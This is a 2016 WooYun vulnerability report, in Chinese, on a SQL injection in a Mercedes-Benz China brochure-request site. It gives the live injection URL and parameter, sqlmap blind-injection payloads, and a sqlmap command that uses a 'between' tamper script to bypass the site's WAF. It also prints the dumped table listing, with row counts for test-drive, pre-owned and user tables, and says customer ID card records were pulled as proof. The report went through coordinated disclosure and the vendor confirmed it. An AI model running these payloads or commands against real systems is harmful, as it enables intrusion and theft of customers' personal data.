当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198751

漏洞标题:汽车安全之奔驰某站SQL注入/可影响大量客户信息(bypass waf)

相关厂商:mercedes-benz.com.cn

漏洞作者: 路人甲

提交时间:2016-04-21 11:27

修复时间:2016-06-05 12:00

公开时间:2016-06-05 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

详细说明:

注入点:https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn

sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=16) AND 8776=8776 AND (8606=8606&language=cn
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=16) AND (SELECT * FROM (SELECT(SLEEP(5)))Fzth) AND (7771=7771&language=cn
---
web server operating system: Linux
web application technology: Apache
back-end DBMS: MySQL 5.0.12


有过滤。
爆当前数据库的时候需要添加脚本between!!!!
sqlmap.py -u "https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn" --batch --random-agent --tamper=between --current-db

Database: db_contactnew
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| ci_statistical_page | 20997746 |
| ci_statistical_model | 1332505 |
| ci_statistical_brochure | 632541 |
| ci_statistical_pricelist | 194508 |
| ci_brochure | 135619 |
| bak_ci_preownd_20160315 | 43942 |
| ci_preownd | 42708 |
| ci_test_drive_20160415 | 39587 |
| ci_test_drive | 30309 |
| ci_newsletter | 4996 |
| ci_email | 4609 |
| ci_campaignairchina | 1906 |
| ci_arena_form | 643 |
| ci_dealer | 505 |
| ci_model_class | 485 |
| ci_city | 461 |
| ci_dealer_bak | 213 |
| ci_ib_modeldata_feature | 154 |
| ci_user_weiboapp | 91 |
| ci_model_preowned | 74 |
| ci_presale | 68 |
| ci_model_brochure | 54 |
| ci_model | 48 |
| ci_wallpaper | 48 |
| ci_z | 48 |
| ci_arena_events | 45 |
| ci_model_pricelist | 44 |
| ci_model_brand | 36 |
| ci_province | 34 |
| ci_ib_modeldata_technical | 27 |
| ci_model_bodytype | 22 |
| ci_user | 4 |
+---------------------------+---------+


数据量不小哦!
来看下一些隐私信息,4万多:

bc1.png


用户身份证信息,只爆3条记录作为证明

bc2.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-21 11:50

厂商回复:

于已披露漏洞(WooYun-2016-)情况相同,感谢乌云平台及作者路人甲对我公司的及时预警!

最新状态:

暂无


漏洞评价:

评价